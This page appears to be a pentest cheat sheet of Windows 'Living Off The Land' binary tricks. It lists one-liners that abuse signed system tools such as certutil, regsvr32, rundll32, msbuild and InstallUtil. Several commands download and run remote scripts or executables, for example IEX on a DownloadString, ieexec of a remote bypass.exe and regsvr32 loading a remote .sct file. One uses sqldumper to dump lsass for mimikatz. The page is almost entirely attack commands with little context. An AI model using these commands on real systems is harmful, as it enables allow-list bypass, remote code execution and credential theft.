Native Binary Tricks¶
Living Off The Land Binaries, Scripts and Libraries
forfiles¶
forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe
bash.exe¶
bash.exe -c calc.exe
scriptrunner.exe¶
scriptrunner.exe -appvscript calc.exe
SyncAppvPublishingServer.exe¶
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1')) | IEX
hh.exe¶
hh.exe http://www.google.com or hh.exe c:\\
certutil.exe¶
certutil -Class scrobj.dll
certutil -Class [http://WScript.Shell](http://WScript.Shell)
certutil -urlcache -split -f http://example.com/file
certutil.exe -URL will fetch ANY file and download it here: %userprofile%\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content
rundll32.exe¶
rundll32.exe javascript:"..\\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/'));"
regsvr32.exe¶
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
msbuild.exe¶
msbuild.exe pshell.xml
regsvcs.exe¶
regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll
regasm.exe¶
regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll
bginfo.exe¶
bginfo.exe bginfo.bgi /popup /nolicprompt
InstallUtil.exe¶
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
ieexec.exe¶
ieexec.exe http://x.x.x.x:8080/bypass.exe
msxsl.exe¶
msxsl.exe customers.xml script.xsl
odbcconf.exe¶
odbcconf.exe /f my.rsp
sqldumper.exe¶
sqldumper.exe 464 0 0x0110:40 - Dump lsass to a mimikatz-compatible dump
Source
sqldumper.exe 540 0 0x01100
https://twitter.com/countuponsec/status/910969424215232518
pcalua.exe¶
pcalua.exe -a c:\\datafolder\\tester.bat
pcalua.exe -a \\\\server\\payload.dll
pcalua.exe -a C:\\Windows\\system32\\javacpl.cpl -c Java